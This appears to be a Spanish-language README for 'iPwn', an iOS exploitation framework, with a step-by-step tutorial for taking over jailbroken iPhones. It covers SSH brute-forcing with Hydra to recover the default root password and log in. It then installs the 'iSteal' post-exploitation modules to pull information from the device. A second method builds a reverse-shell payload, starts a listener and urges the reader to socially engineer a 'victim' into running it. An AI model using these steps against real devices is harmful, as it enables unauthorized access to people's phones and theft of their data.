
Un framework diseñado para la explotación de dispositivos iOS.
Un framework diseñado para la explotación de dispositivos iOS.

<!> RECUERDA: EL IPHONE AL QUE INTENTAS ACCEDER CON ESTA HERRAMIENTA DEBE ESTAR HACKEADO (JAILBROKEN) <!>
Este proyecto aún está en desarrollo. Estoy agregando más extensiones y opciones para post-explotación con el fin de recolectar información del dispositivo y otras cosas. También estoy trabajando en una forma de incorporar un payload en un tweak normal de iOS para que obtener una reverse shell sea más fácil.
[6/2/21] - Se agregó un menú adicional para personas que tienen sus dispositivos conectados a su computadora y quieren experimentar con ellos. Pronto se agregarán más opciones.
[6/2/21] - Se agregaron 4 módulos extra para la herramienta de post-explotación 'iSteal'. También se añadió una opción para instalar el jailbreak checkra1n.
[5/25/21] - Se agregaron 8 módulos extra para la herramienta de post-explotación 'iSteal'.
[5/25/21] - Se agregaron 2 módulos extra para la herramienta de post-explotación 'iSteal'.
iPwn es un framework diseñado para explotar y obtener acceso a dispositivos iOS. También tiene una extensión que es un mini-framework llamado 'iSteal' que está diseñado para la post-explotación (después de obtener acceso al dispositivo). Esta descripción te guiará a través de las diferentes formas y pasos para obtener acceso a un dispositivo iOS y extraer información del mismo.
La primera forma de obtener acceso a un dispositivo iOS. - SSH-Bruteforcing.
La mayoría de los dispositivos iOS con jailbreak que tienen Cydia vienen preinstalados con OpenSSH. Y generalmente, las credenciales son muy débiles o comunes; una de las contraseñas más comunes estará incluida en una lista de palabras que debería estar en tu carpeta si descargaste iPwn desde mi Github.
¡Así que empecemos! Primero, comenzaremos ejecutando el script.
python main.py
Luego, escribiremos el comando 'brute'. (Si quieres escribir help y familiarizarte con los comandos, puedes hacerlo).

Una vez que escribamos el comando 'brute', escribe 'help' para mostrar todos los comandos disponibles.
Ahora, usaremos el comando 'default' para iniciar SSH-Bruteforcing con una lista de palabras que contiene las contraseñas más comunes.
Se te pedirá que ingreses la dirección IP del objetivo; asegúrate de ingresar la correcta y válida, presiona Enter y luego continúa con el siguiente paso.

<!> SI ESTÁS OBTENIENDO ERRORES, ASEGÚRATE DE QUE HYDRA ESTÉ INSTALADO. PUEDES INSTALAR HYDRA CON LOS COMANDOS A CONTINUACIÓN <!>
comandos para instalar hydra:
sudo apt install hydra
sudo pacman -S hydra
Volviendo al tutorial, si tienes hydra instalado en tu PC, ya debería estar intentando hacer fuerza bruta. Solo espera entre 20 y 40 segundos; si el dispositivo utiliza las credenciales predeterminadas/comunes proporcionadas en la lista de palabras, Hydra te dará un pequeño mensaje que muestra la contraseña correcta.

Como podemos ver, la contraseña correcta es 'alpine'. Ahora podemos iniciar sesión en el teléfono haciendo 'ssh root@ip_del_dispositivo' en otra ventana de terminal. Cuando te pida una contraseña, simplemente ingresa la contraseña que obtuviste de Hydra.

¡Ahora hemos iniciado sesión!

En este punto, probablemente queramos recopilar información sobre el teléfono y controlarlo; eso vendrá después. Porque primero necesitamos instalar algunas cosas muy importantes. Si quieres usar SCP para transferir el archivo de configuración que automatiza todo, puedes hacerlo. El archivo está en /post-exploitation/post.sh. Una vez que hayas transferido el archivo 'post.sh' al dispositivo iOS, ejecútalo haciendo 'bash post.sh' y debería comenzar a instalar y configurar las herramientas de post-explotación que usaremos.
<!> NOTA: LOS COMANDOS A CONTINUACIÓN SON SOLO PARA LAS PERSONAS QUE QUIERAN INSTALAR LOS PAQUETES Y HERRAMIENTAS NECESARIOS MANUALMENTE <!>
ejecuta todos estos comandos para configurar/instalar todo lo necesario:
apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git
Bien, ahora que tenemos todo instalado, podemos ir a la carpeta 'iSteal' y ejecutar el script de post-explotación 'iSteal'.
python3 post.py
<!> NOTA: Asegúrate de que al ejecutar archivos python, lo hagas usando "python3" en lugar de "python" o "py" <!>
Entonces el script ya debería estar cargado; si quieres usar el comando 'help' y explorar, puedes hacerlo.

Ahora, vamos a usar el comando 'list' para mostrar los módulos/opciones disponibles para post-explotación.

<!> TEN EN CUENTA: HABRÁ MUCHAS ACTUALIZACIONES EN EL SCRIPT DE POST-EXPLOTACIÓN, Y SE AGREGARÁN MÁS MÓDULOS, POR LO QUE ESTA IMAGEN SE ACTUALIZARÁ PARA MANTENER LA PRECISIÓN <!>
Para usar un módulo, simplemente haz 'use módulo/específico'. Ejemplo: use modules/list_installed_default_apps
Y como puedes ver, cuando ejecutamos ese módulo, nos muestra las aplicaciones predeterminadas instaladas en el dispositivo iOS del objetivo.

La segunda forma de obtener acceso a un dispositivo iOS. - Reverse shell.
Ahora, te voy a mostrar cómo hacerlo de la segunda manera, que es un poco más avanzada. Ten en cuenta que no incluiré imágenes para esta parte.
ejecuta el framework iPwn haciendo 'python main.py'
escribe el comando 'payload'
espera a que se cargue la fábrica de payloads.
selecciona un payload de tu elección, Ejemplo: use payloads/factory/reverse_bash
ingresa tu IP
ingresa tu Puerto
luego deberías recibir un mensaje que dice 'payload generated'
escribe el comando 'back' para volver al menú principal
escribe el comando 'listen' para empezar a escuchar conexiones entrantes
asegúrate de que la víctima ejecute el script a través de la terminal o por su cuenta; intenta ingeniería social, ¡sé creativo!
una vez que el script se ejecute en el dispositivo iOS de la víctima, deberías recibir una conexión
instala los paquetes importantes transfiriendo el archivo 'post.sh' ubicado en /post-exploitation y ejecutándolo, o hazlo manualmente.
ahora puedes ejecutar las herramientas de post-explotación 'iSteal' o 'AutoEnum'
¡disfruta! :)
<!> Si estás haciendo el paso 2 y te quedas atascado en la parte donde tienes que instalar los paquetes/herramientas importantes, ve al paso 1 y copia la guía para instalar los paquetes/herramientas. <!>